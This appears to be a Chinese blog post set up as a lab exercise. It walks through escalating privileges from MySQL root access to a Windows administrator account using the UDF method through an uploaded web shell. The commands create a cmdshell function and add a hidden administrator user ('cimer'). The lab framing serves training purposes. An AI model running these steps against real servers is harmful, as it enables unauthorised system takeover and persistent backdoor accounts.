Mysql数据库提权

    选择打赏方式

1.1实验简介 

本实验主要介绍Mysql数据库的提权,通过本实验可以掌握当服务器装用Mysql数据库时如何获取服务器权限。 

 

1.2实验环境

服务器配置:windows+apache+php+Mysql

密码信息: Mysql数据库用户名/密码:root/123123        

实验目标:http://xx.xx.xx.xx/code.php      大马密码:admin 

 

1.3实验步骤

Mysql数据库提权

Mysql数据库提权主要是利用udf方法提权。

①、首先访问页面http://xx.xx.xx.xx/code.php

 

 

②、上传udf提权马,


  

Host输入:localhost

Name输入:root

Pass输入:123123

Database输入:mysql 

 

 

 

③、点击导出udf


 

 

④、点自带命令中的创建cmdshell


 

 

⑤、然后在自定义Sql语句中输入:select cmdshell(net user cimer 123456 /add)


 

 

⑥、继续输入语句:select cmdshell(net localgroup administrators cimer /add)


 


 ⑦、继续输入语句:select cmdshell(net user) 

 

 

 

⑧、成功添加cimer用户。

版权声明:若无特殊注明,本文皆为《 Chin 》原创,转载请保留文章出处。
本文链接:Mysql数据库提权 https://www.qinor.cn/post-24.html
正文到此结束

热门推荐

发表吐槽

你肿么看?

你还可以输入 250 / 250 个字

嘻嘻 大笑 可怜 吃惊 害羞 调皮 鄙视 示爱 大哭 开心 偷笑 嘘 奸笑 委屈 抱抱 愤怒 思考 日了狗 胜利 不高兴 阴险 乖 酷 滑稽

评论信息框

吃奶的力气提交吐槽中...

已有1条吐槽

匿名

2018-10-09 15:44 广东省广州市移动GSM/TD-SCDMA/LTE全省共用出口
好好好
 OPPO   MQQBrowser 6.2